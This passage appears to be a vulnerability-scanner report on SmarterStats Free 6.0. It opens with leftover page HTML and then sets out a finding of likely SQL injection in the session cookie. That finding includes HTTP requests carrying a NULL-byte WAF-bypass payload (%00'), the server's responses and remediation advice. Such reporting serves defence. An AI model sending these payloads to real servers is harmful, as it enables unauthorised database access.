       <script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask=Specific/root"></script>
       <div class="PageHeader" id="PageHeader">
           <div class="PageHeaderText">
               <div class="PageHeaderActions">
                   
                   <span id="ctl00_HA"><span class="HeaderUserName">weirdo</span> | <span class="HeaderUserName">vilnerable.smarterstats.6.0.host</span> | <span class="HeaderLogOut"><a href="/Logout.aspx" target="_self" >Logout</a></span> | <span class="HeaderHelp"><a href="javascript:ShowHelpRadWindow()">Help</a></span></span>
               </div>
               <div class="PageHeaderVersion" id="PageHeaderVersion">
                   SmarterStats Free 6.0
               </div>
           </div>
       </div>
       
<!-- HyperSplitter -->
<div class='hsOuter ' id='ctl00_Split' style='visibility:hidden'>
<table class='hsContainer' id='ctl00_Split_Container'>
   <tr>
       <td class='hsHorizontal Sidebar' id='ctl00_Split_SB' style='width:46px'>
           <div class='hsContent' style='height:100%;' id='ctl00_Split_SB_Content'>
               
               <div class="SidebarWrapper"><div id="SidebarScrollUp" class="SidebarScrollUp"><a></a></div><div id="SidebarScroller" class="SidebarScroller">

<div id="SidebarIcon_UserWorkspace" class="SidebarIcon">
   <a class="SidebarAnchor SidebarIconUserWorkspace" href="/Default.aspx?section=UserWorkspace" onclick="UpdateSection('UserWorkspace', '/Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace', true, false); return false;">
       <div class="SidebarCount"></div>
       <div class="SidebarSliderWrapper"><div class="SidebarSlider"><div>Workspace</div></div></div>
   </a>
</div>

<div id="SidebarIcon_UserActivity" class="SidebarIcon">
   <a class="SidebarAnchor SidebarIconUserActivity" href="/Default.aspx?section=UserActivity" onclick="UpdateSection('UserActivity', '/Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_SiteActivity', true, false); return false;">
       <div class="SidebarCount"></div>
       <div class="SidebarSliderWrapper"><div class="SidebarSlider"><div>Site Activity</div></div></div>
   </a>
</div>

<div id="SidebarIcon_UserDemographics" class="SidebarIcon">
   <a class="SidebarAnchor SidebarIconUserDemographics" href="/Default.aspx?section=UserDemographics" onclick="UpdateSection('UserDemographics', '/Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_Demographics', true, false); return false;">
       <div class="SidebarCount"></div>
       <div class="SidebarSliderWrapper"><div class="SidebarSlider"><div>Demographics</div></div></div>
   </a>
</div>

<div id="SidebarIcon_UserServerHealth" class="SidebarIcon">
   <a class="SidebarAnchor SidebarIconUserServerHealth" href="/Default.aspx?section=UserServerHealth" onclick="UpdateSection('UserServerHealth', '/Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_ServerHealth', true, false); return false;">
       <div class="SidebarCount"></div>
       <div class="SidebarSliderWrapper"><div class="SidebarSlider"><div>Server Health</div></div></div>
   </a>
</div>

<div id="SidebarIcon_UserSpiders" class="SidebarIcon">
   <a class="SidebarAnchor SidebarIconUserSpiders" href="/Default.aspx?section=UserSpiders" onclick="UpdateSection('UserSpiders', '/Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_Spiders', true, false); return false;">
       <div class="SidebarCount"></div>
       <div class="SidebarSliderWrapper"><div class="SidebarSlider"><div>Spiders and Bots</div></div></div>
   </a>
</div>

<div id="SidebarIcon_UserSeo" class="SidebarIcon">
   <a class="SidebarAnchor SidebarIconUserSeo" href="/Default.aspx?section=UserSeo" onclick="UpdateSection('UserSeo', '/Client/frmSeoCollections.aspx', true, false); return false;">
       <div class="SidebarCount"></div>
       <div class="SidebarSliderWrapper"><div class="SidebarSlider"><div>SEO</div></div></div>
   </a>
</div>

<div id="SidebarIcon_UserDataMining" class="SidebarIcon">
   <a class="SidebarAnchor SidebarIconUserDataMining" href="/Default.aspx?section=UserDataMining" onclick="UpdateSection('UserDataMining', '/Client/frmDataMineStart.aspx', true, false); return false;">
       <div class="SidebarCount"></div>
       <div class="SidebarSliderWrapper"><div class="SidebarSlider"><div>Data Mining</div></div></div>
   </a>
</div>

<div id="SidebarIcon_UserSettings" class="SidebarIcon">
   <a class="SidebarAnchor SidebarIconUserSettings" href="/Default.aspx?section=UserSettings" onclick="UpdateSection('UserSettings', '/Client/frmUser.aspx?action=mysettings', true, false); return false;">
       <div class="SidebarCount"></div>
       <div class="SidebarSliderWrapper"><div class="SidebarSlider"><div>Settings</div></div></div>
   </a>
</div>
</div><div id="SidebarScrollDown" class="SidebarScrollDown"><a></a></div></div>

           </div>
       </td>
       <td class='hsHorizontal ' id='ctl00_Split_LP' style='width:250px'>
           <div class='hsContent' style='height:100%;' id='ctl00_Split_LP_Content'>
               
               <div id="ctl00_Split_LP_StyledUpdatePanel1">
                   
                   
<div class="PageTitle" id="SectionHeader">
   <div class="RoundedPageTitleLeft">
       <div class="RoundedPageTitleRight">
           <div id="SectionHeaderText" class="PageTitleText">
               Settings
           </div>
       </div>
   </div>
</div>
<div id="ButtonBar" class="ButtonBar">
   
<!-- HyperMenu -->
                   <div class='hmMenuBar'><ul class='hmMenu hmMenuBar hmList' id='ctl00_Split_LP_ctl01_menuSN' name='ctl00$Split$LP$ctl01$menuSN' style='z-index:800'>
                   </ul>
                   </div>
                   <div class='hmClear'><!-- --></div>
                   
</div>
<div id="LeftScrollable" class="ContentDiv">
   
<!-- HyperTreeView -->
                   <div class='htvTree'><ul class='htvTree' id='ctl00_Split_LP_ctl01_treeNav'>
                       <li class='htvNode' id='ctl00_Split_LP_ctl01_treeNav_htv0' TTUID="NAVMySettings" TTUID="treeMySettings" >
                           <div class='htvLineFirst'>
                               <span class='htvToggle htvExpanded'></span>
                               <span class='htvSp'></span><img class='htvImg' src='/App_Themes/Default/Images/16x16/folder.gif' /><a class='htvA' href='#'>My Settings</a>
                           </div>
                           <ul class='htvSub' style='display:block;'>
                               <li class='htvNode' id='ctl00_Split_LP_ctl01_treeNav_htv0_htv0' TTUID="NAVMySettingsAccountSettings" TTUID="treeMySettingsAccountSettings" >
                                   <div class='htvLine'>
                                       <span class='htvSp'></span><img class='htvImg' src='/App_Themes/Default/Images/16x16/accountsettings.gif' /><a class='htvA' href='#'>Account Settings</a>
                                   </div>
                               </li>
                               <li class='htvNode htvBottom' id='ctl00_Split_LP_ctl01_treeNav_htv0_htv1' TTUID="NAVMySettingsFilterSets" TTUID="treeMySettingsFilterSets" >
                                   <div class='htvLineLast'>
                                       <span class='htvSp'></span><img class='htvImg' src='/App_Themes/Default/Images/16x16/autoresponder.gif' /><a class='htvA' href='#'>Filter Sets</a>
                                   </div>
                               </li>
                           </ul>
                       </li>
                       <li class='htvNode htvBottom' id='ctl00_Split_LP_ctl01_treeNav_htv1' Requires="SITEADMIN" TTUID="NAVSiteSettings" TTUID="treeSiteSettings" >
                           <div class='htvLineLast'>
                               <span class='htvToggle htvExpanded'></span>
                               <span class='htvSp'></span><img class='htvImg' src='/App_Themes/Default/Images/16x16/folder.gif' /><a class='htvA' href='#'>Site Settings</a>
                           </div>
                           <ul class='htvSub' style='display:block;'>
                               <li class='htvNode' id='ctl00_Split_LP_ctl01_treeNav_htv1_htv0' Requires="SITEADMIN" TTUID="NAVSiteSettingsGeneralSettings" TTUID="treeSiteSettingsGeneralSettings" >
                                   <div class='htvLine'>
                                       <span class='htvSp'></span><img class='htvImg' src='/App_Themes/Default/Images/16x16/domainsettings.gif' /><a class='htvA' href='#'>General Settings</a>
                                   </div>
                               </li>
                               <li class='htvNode' id='ctl00_Split_LP_ctl01_treeNav_htv1_htv1' Requires="SITEADMIN" TTUID="NAVSiteSettingsUsers" TTUID="treeSiteSettingsUsers" >
                                   <div class='htvLine'>
                                       <span class='htvSp'></span><img class='htvImg' src='/App_Themes/Default/Images/16x16/accountsettings.gif' /><a class='htvA' href='#'>Users</a>
                                   </div>
                               </li>
                               <li class='htvNode' id='ctl00_Split_LP_ctl01_treeNav_htv1_htv2' Requires="ENTERPRISE&#x2c;&#x20;SITEADMIN" TTUID="NAVSiteSettingsEmailSettings" TTUID="treeSiteSettingsEmailSettings" >
                                   <div class='htvLine'>
                                       <span class='htvSp'></span><img class='htvImg' src='/App_Themes/Default/Images/16x16/PopRetrieval.gif' /><a class='htvA' href='#'>Email Settings</a>
                                   </div>
                               </li>
                               <li class='htvNode' id='ctl00_Split_LP_ctl01_treeNav_htv1_htv3' Requires="SITEADMIN" TTUID="NAVSiteSettingsPageAliases" TTUID="treeSiteSettingsPageAliases" >
                                   <div class='htvLine'>
                                       <span class='htvSp'></span><img class='htvImg' src='/App_Themes/Default/Images/16x16/aliases.gif' /><a class='htvA' href='#'>Page Aliases</a>
                                   </div>
                               </li>
                               <li class='htvNode' id='ctl00_Split_LP_ctl01_treeNav_htv1_htv5' Requires="SITEADMIN&#x2c;SEOENABLED" TTUID="NAVSiteSettingsSEOSettings" TTUID="treeSiteSettingsSEOSettings" >
                                   <div class='htvLine'>
                                       <span class='htvSp'></span><img class='htvImg' src='/App_Themes/Default/Images/16x16/protocolsettings.gif' /><a class='htvA' href='#'>SEO Settings</a>
                                   </div>
                               </li>
                               <li class='htvNode htvBottom' id='ctl00_Split_LP_ctl01_treeNav_htv1_htv6' Requires="SITEADMIN" TTUID="NAVSiteSettingsLogStatus" TTUID="treeSiteSettingsLogStatus" >
                                   <div class='htvLineLast'>
                                       <span class='htvSp'></span><img class='htvImg' src='/App_Themes/Default/Images/16x16/allmessages.gif' /><a class='htvA' href='#'>Log Status</a>
                                   </div>
                               </li>
                           </ul>
                       </li>
                   </ul></div>
                   
</div>
<div id="ctl00_Split_LP_ctl01_Footer" class="Footer">
</div>


   <script type="text/javascript">
       if (self.ResizeLeftBar) ResizeLeftBar();
   </script>



               </div>
               
               <a id="ctl00_Split_LP_lnkUpdate" href="javascript:__doPostBack(&#39;ctl00$Split$LP$lnkUpdate&#39;,&#39;&#39;)"></a>
               <input type="hidden" name="ctl00$Split$LP$SessionKey" id="ctl00_Split_LP_SessionKey" value="275a2fda26bf41d0a434458863c81036" />
           </div>
       </td>
       <td class='hsHorizontal Splitter' id='ctl00_Split_SplitBar' style='width:2px'>
           <div class='hsContent' style='height:100%;' id='ctl00_Split_SplitBar_Content'>
               
           </div>
       </td>
       <td class='hsHorizontal ' id='ctl00_Split_Frame' style=''>
           <div class='hsContent' style='height:100%;' id='ctl00_Split_Frame_Content'>
               
               <iframe id="ctl00_Split_Frame_ContentFrame" frameborder="0" scrolling="no" src="/Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace" style="width: 100%; border: none"></iframe>
               

           </div>
       </td>
   </tr>
</table>
</div>

       <div class="PageFooter" id="PageFooter">
       </div>
       <input type="hidden" name="ctl00$PageTitle" id="ctl00_PageTitle" value=".&#39;&#39;" />
       <input type="hidden" name="ctl00$PanelLoadedState" id="ctl00_PanelLoadedState" value="{}" />

       <script type="text/javascript">
           self.LBHidden = false;
           var panelLoadedStateObj = $get('ctl00_PanelLoadedState');
           var processingText = "Processing";
           var loadingText = "SmarterStats is loading...";
           var currentSection = 'UserSettings';
           var sidebarHeight = 0;
           var firstResize = true;
           var pageTitleId = 'ctl00_PageTitle';
           var $sup = $('#ctl00_Split_LP_StyledUpdatePanel1');
           var $scrollers = $('#SidebarScrollUp, #SidebarScrollDown');
           var $splitter = $('#ctl00_Split');
           var $sbs = $('#SidebarScroller');
           var $sbw = $sbs.parent();
           var $sbwp = $sbw.parent();
           var _extContentElement = $get('ctl00_Split_Frame_ContentFrame');
           function GetSMPane() { return self; }
           function Update(name) {
               $get(pageTitleId).value = document.title;
               SetCookieValue("TopBarSection", name);
               __doPostBack('ctl00$Split$LP$lnkUpdate',name + "|" + currentPage);
               currentSection = name;
               UpdateHash();
           }
           NavigateToHash();
           function HideLeftBar(val) {
               if (val === undefined) return;
               if (self.LBHidden == val) return;
               self.LBHidden = val;
               if (val) $('#ctl00_Split_LP, #ctl00_Split_SplitBar').HideHyperPane();
               else $('#ctl00_Split_LP, #ctl00_Split_SplitBar').ShowHyperPane();
               UpdateHash();
           }
           function SplitterResized() {
               ResizeLeftBar(true);
               ResizeIframes();
           }
           function ResizeLeftBar(setWidth) {
               if (firstResize) {
                   firstResize = false;
                   $scrollers.hide();
                   sidebarHeight = $sbs.outerHeight();
                   $sbw.height(sidebarHeight);
                   InitSidebarSliders();
               }

               $sup.ResizeToFit();
               var $ls = $('#LeftScrollable');
               $ls.parent().css('overflow','hidden');
               $ls.ResizeToFit();
               $ls.parent().css('overflow','visible');

               if (setWidth) {
                   var width = $sup.GetResizedWidth();
                   $sup.width(width);
                   $ls.width(width);
               }
               if (self.AdditionalResizeLeftBar) self.AdditionalResizeLeftBar();

               if ($sbwp.innerHeight() < sidebarHeight) {
                   $scrollers.show();
                   $sbw.ResizeToFit();
                   $sbs.ResizeToFit();
               }
               else if ($scrollers.is(':visible')) {
                   $scrollers.hide();
                   $sbw.height(sidebarHeight);
                   $sbs.height(sidebarHeight);
                   $sbs.scrollTop(0);
               }
           }
           function InitSidebarSliders() {
               var animationTime = self.EnableAnimations ? 150 : 0;
               $('.SidebarSlider').each(function() {
                   var control = $(this);
                   var wrapper = control.parent();
                   var parent = control.parent().parent();
                   var off = parent.offset();
                   control.children('div').css('float','none');
                   var width = control.innerWidth(true);
                   control.children('div').css('float','right');
                   control.add(wrapper).css({ top: off.top - 1, left: off.left + parent.outerWidth(true), width: 0, visibility: 'visible'}).hide();
                   var timer;
                   parent.hover(function() {
                       clearTimeout(timer);
                       parent.addClass('SidebarAnchorHover');
                       var off = parent.offset();
                       control.add(wrapper).css({ top: off.top - 1});
                       control.add(wrapper).stop().show().animate({ width: width}, animationTime, function () { wrapper.width(width+1); });
                   }, function() {
                       clearTimeout(timer);
                       timer = setTimeout(function () { control.add(wrapper).stop().animate({ width: 0}, animationTime, function () { control.add(wrapper).hide(); parent.removeClass('SidebarAnchorHover'); }); } , 66);
                   });
               });
           }
           function DoResize() {
               $splitter.ResizeHyperSplitter();
               ResizeLeftBar();
               ResizeIframes();
           }
           $(window).resize(function() { clearTimeout(self.resizeDelay); self.resizeDelay = setTimeout(DoResize, 100); });
           $(window).load(function() {
               InitAjaxHandlers();
               ShowSection(currentSection, currentSection);
               Initialize();
               DoResize();
               setTimeout(function() { $('#loadingMessage').hide(); }, self.isNavigatingToHash ? 500 : 250);
           });
       </script>

       
       
<div id="ConfirmWindow" class="ConfirmWindow" style="display: none">
   <div id="DivConfirmContent" class="ConfirmContent">
       <div class="ConfirmNote" id="ConfirmText">
           &nbsp;
       </div>
   </div>
   <div id="ctl00_DC1_Button" class="PopupButtons">
       <div class="ButtonBarRight">
           <span id="CancelButtonWrapper">
               <div id="ctl00_DC1_CancelButton" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="CancelPopup();; return false;"><span class="BBInner">Cancel</span></a></div>
           </span>
           <div id="ctl00_DC1_SaveButton" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="OKPopup();; return false;"><span class="BBInner">OK</span></a></div>
       </div>
   </div>
   <span id="MessageHeaderText" style="display: none">
       Message</span>
   <input style="position: absolute; top: -1000px;" id="DeleteKeyCaptureBox" />

   <script type="text/javascript">
       function GetConfirmTitle() {
           return $('#MessageHeaderText').html();
       }
       function ShowAlert(errorMessage) {
           $('#CancelButtonWrapper').css('display', 'none');
           $('#ConfirmText').html(errorMessage).css('display', '');
       }
       function ShowConfirm(type, size) {
           var displayText = confirmationDialogKeys[type];
           if (displayText == undefined) displayText = type;
           $('#CancelButtonWrapper').css('display', '');
           $('#ConfirmText').html(displayText.replace(/\{0\}/g, size.toString()));
           $('#DeleteConfirmCount').html(size.toString());
       }
       function CancelPopup() {
           parent.ConfirmCallback(false);
           ClosePopup();
       }
       function OKPopup() {
           parent.ConfirmCallback(true);
           ClosePopup();
       }
       $('#DeleteKeyCaptureBox').live('keydown', function(evt) {
           CancelEvent(evt);
           if ($('#ConfirmWindowModal').attr('display') == 'none') return;
           if (evt.keyCode == 13 || evt.which == 13) OKPopup();
           else if (evt.keyCode == 27 || evt.which == 27) CancelPopup();
           return false;
       });
   </script>

</div>

       
   

<script type="text/javascript">
//<![CDATA[
ClearTreeToggle();
SidebarAjaxLoaded();if (self.LeftBarReady) self.LeftBarReady();$(function() { $('#ctl00_Split').hyperSplitter({"IsHorizontal":true,"Panes":[{"Resizable":false,"SplitBar":false,"MinWidth":46,"MaxWidth":46,"Width":46,"MinHeight":0,"MaxHeight":0,"Height":0,"ResizeCookieName":null,"_ClientID":"ctl00_Split_SB"},{"Resizable":true,"SplitBar":false,"MinWidth":185,"MaxWidth":300,"Width":250,"MinHeight":0,"MaxHeight":0,"Height":0,"ResizeCookieName":"RootLPSize","_ClientID":"ctl00_Split_LP"},{"Resizable":false,"SplitBar":true,"MinWidth":2,"MaxWidth":2,"Width":2,"MinHeight":0,"MaxHeight":0,"Height":0,"ResizeCookieName":null,"_ClientID":"ctl00_Split_SplitBar"},{"Resizable":false,"SplitBar":false,"MinWidth":0,"MaxWidth":0,"Width":0,"MinHeight":0,"MaxHeight":0,"Height":0,"ResizeCookieName":null,"_ClientID":"ctl00_Split_Frame"}]}); });
$(function() { $('#ctl00_Split_LP_ctl01_menuSN').hyperMenu({"ClearFloat":true,"IsContextMenu":false,"CollapseDelay":300,"DropShadows":true,"ClickableMenuItemsWithSubMenus":false,"FunctionMap":{"ctl00_Split_LP_ctl01_menuSN_menuGlobalNew":"return false;"},"ClientCallbacks":{}}); });
$(function() { $('#ctl00_Split_LP_ctl01_treeNav').hyperTreeView({"imagePath":"/App_Themes/Default/Images/16x16/","NoLines":false,"ContextMenuID":null,"FunctionMap":{"ctl00_Split_LP_ctl01_treeNav_htv0_htv0":"UpdateFrame(\u0027\\x2fClient\\x2ffrmUser\\x2easpx\\x3faction\\x3dmysettings\u0027);","ctl00_Split_LP_ctl01_treeNav_htv0_htv1":"UpdateFrame(\u0027\\x2fClient\\x2ffrmFilterSets\\x2easpx\u0027);","ctl00_Split_LP_ctl01_treeNav_htv1_htv0":"UpdateFrame(\u0027\\x2fClient\\x2ffrmImportSettings\\x2easpx\u0027);","ctl00_Split_LP_ctl01_treeNav_htv1_htv1":"UpdateFrame(\u0027\\x2fClient\\x2ffrmUsers\\x2easpx\u0027);","ctl00_Split_LP_ctl01_treeNav_htv1_htv2":"UpdateFrame(\u0027\\x2fClient\\x2ffrmEmailReportSettings\\x2easpx\u0027);","ctl00_Split_LP_ctl01_treeNav_htv1_htv3":"UpdateFrame(\u0027\\x2fClient\\x2ffrmPageAliases\\x2easpx\u0027);","ctl00_Split_LP_ctl01_treeNav_htv1_htv4":"UpdateFrame(\u0027\\x2fClient\\x2ffrmSkins\\x2easpx\u0027);","ctl00_Split_LP_ctl01_treeNav_htv1_htv5":"UpdateFrame(\u0027\\x2fClient\\x2ffrmSeoSettings\\x2easpx\u0027);","ctl00_Split_LP_ctl01_treeNav_htv1_htv6":"UpdateFrame(\u0027\\x2fClient\\x2ffrmLogsImported\\x2easpx\u0027);"},"ClientCallbacks":{"onExpand":"RecordTreeExpanded","onCollapse":"RecordTreeCollapsed"}}); });
//]]>
</script>
</form>
</body>
</html>


2.5. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [ASP.NET_SessionId cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Services/SiteAdmin.asmx

Issue detail

The ASP.NET_SessionId cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ASP.NET_SessionId cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /Services/SiteAdmin.asmx?op=GetAllSites2 HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4%00'; loginsettings=;

Response 1

HTTP/2.0 500 Internal Server Error
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 07:02:22 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6785
Connection: Close

<html>
<head>
<title>Collection was modified; enumeration operation may not execute.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>Collection was modified; enumeration operation may not execute.</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

<br><br>

<b> Exception Details: </b>System.InvalidOperationException: Collection was modified; enumeration operation may not execute.<br><br>

<b>Source Error:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code>

The source code that generated this unhandled exception can only be shown when compiled in debug mode. To enable this, please follow one of the below steps, then request the URL:<br><br>1. Add a &quot;Debug=true&quot; directive at the top of the file that generated the error. Example:<br><br> &nbsp;&nbsp;&lt;%@ Page Language=&quot;C#&quot; Debug=&quot;true&quot; %&gt;<br><br>or:<br><br>2) Add the following section to the configuration file of your application:<br><br>&lt;configuration&gt;<br> &nbsp;&nbsp;&nbsp;&lt;system.web&gt;<br> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;compilation debug=&quot;true&quot;/&gt;<br> &nbsp;&nbsp;&nbsp;&lt;/system.web&gt;<br>&lt;/configuration&gt;<br><br> Note that this second technique will cause all files within a given application to be compiled in debug mode. The first technique will cause only that particular file to be compiled in debug mode.<br><br>Important: Running applications in debug mode does incur a memory/performance overhead. You should make sure that an application has debugging disabled before deploying into production scenario.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

[InvalidOperationException: Collection was modified; enumeration operation may not execute.]
System.Collections.HashtableEnumerator.MoveNext() +12630115
System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile) +536
System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas) +204
System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +190
System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +75
ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e) +2222
System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) +25
System.Web.UI.Control.LoadRecursive() +95
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +2760
</pre></code>

</td>
</tr>
</table>

<br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.1

</font>

</body>
</html>
<!--
[InvalidOperationException]: Collection was modified; enumeration operation may not execute.
at System.Collections.Hashtable.HashtableEnumerator.MoveNext()
at System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile)
at System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas)
at System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e)
at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e)
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
[HttpUnhandledException]: Exception of type &#39;System.Web.HttpUnhandledException&#39; was thrown.
at System.Web.UI.Page.HandleError(Exception e)
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequest(HttpContext context)
at System.Web.Services.Protocols.DocumentationServerProtocol.WriteReturns(Object[] returnValues, Stream outputStream)
[InvalidOperationException]: The XML Web service help page encountered an internal error.
at System.Web.Services.Protocols.WebServiceHandler.WriteException(Exception e)
at System.Web.Services.Protocols.WebServiceHandler.CoreProcessRequest()
at System.Web.Services.Protocols.SyncSessionlessHandler.ProcessRequest(HttpContext context)
at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
-->

Request 2

GET /Services/SiteAdmin.asmx?op=GetAllSites2 HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4%00''; loginsettings=;

Response 2

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 07:02:22 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private, max-age=0
Content-Type: text/html; charset=utf-8
Content-Length: 28998
Connection: Close



<html>

<head><link rel="alternate" type="text/xml" href="/Services/SiteAdmin.asmx?disco" />

<style type="text/css">

       BODY { color: #000000; background-color: white; font-family: Verdana; margin-left: 0px; margin-top: 0px; }
       #content { margin-left: 30px; font-size: .70em; padding-bottom: 2em; }
       A:link { color: #336699; font-weight: bold; text-decoration: underline; }
       A:visited { color: #6699cc; font-weight: bold; text-decoration: underline; }
       A:active { color: #336699; font-weight: bold; text-decoration: underline; }
       A:hover { color: cc3300; font-weight: bold; text-decoration: underline; }
       P { color: #000000; margin-top: 0px; margin-bottom: 12px; font-family: Verdana; }
       pre { background-color: #e5e5cc; padding: 5px; font-family: Courier New; font-size: x-small; margin-top: -5px; border: 1px #f0f0e0 solid; }
       td { color: #000000; font-family: Verdana; font-size: .7em; }
       h2 { font-size: 1.5em; font-weight: bold; margin-top: 25px; margin-bottom: 10px; border-top: 1px solid #003366; margin-left: -15px; color: #003366; }
       h3 { font-size: 1.1em; color: #000000; margin-left: -15px; margin-top: 10px; margin-bottom: 10px; }
       ul { margin-top: 10px; margin-left: 20px; }
       ol { margin-top: 10px; margin-left: 20px; }
       li { margin-top: 10px; color: #000000; }
       font.value { color: darkblue; font: bold; }
       font.key { color: darkgreen; font: bold; }
       font.error { color: darkred; font: bold; }
       .heading1 { color: #ffffff; font-family: Tahoma; font-size: 26px; font-weight: normal; background-color: #003366; margin-top: 0px; margin-bottom: 0px; margin-left: -30px; padding-top: 10px; padding-bottom: 3px; padding-left: 15px; width: 105%; }
       .button { background-color: #dcdcdc; font-family: Verdana; font-size: 1em; border-top: #cccccc 1px solid; border-bottom: #666666 1px solid; border-left: #cccccc 1px solid; border-right: #666666 1px solid; }
       .frmheader { color: #000000; background: #dcdcdc; font-family: Verdana; font-size: .7em; font-weight: normal; border-bottom: 1px solid #dcdcdc; padding-top: 2px; padding-bottom: 2px; }
       .frmtext { font-family: Verdana; font-size: .7em; margin-top: 8px; margin-bottom: 0px; margin-left: 32px; }
       .frmInput { font-family: Verdana; font-size: 1em; }
       .intro { margin-left: -15px; }

</style>

<title>
   SiteAdmin Web Service
</title></head>

<body>

<div id="content">

<p class="heading1">SiteAdmin</p><br>





<span>
<p class="intro">Click <a href="SiteAdmin.asmx">here</a> for a complete list of operations.</p>
<h2>GetAllSites2</h2>
<p class="intro">Returns all sites listed in the MRS with multiple log locations.</p>

<h3>Test</h3>

To test the operation using the HTTP POST protocol, click the 'Invoke' button.



<form target="_blank" action='http://localhost:9999/Services/SiteAdmin.asmx/GetAllSites2' method="POST">

<table cellspacing="0" cellpadding="4" frame="box" bordercolor="#dcdcdc" rules="none" style="border-collapse: collapse;">
<tr>
   <td class="frmHeader" background="#dcdcdc" style="border-right: 2px solid white;">Parameter</td>
   <td class="frmHeader" background="#dcdcdc">Value</td>
</tr>


<tr>
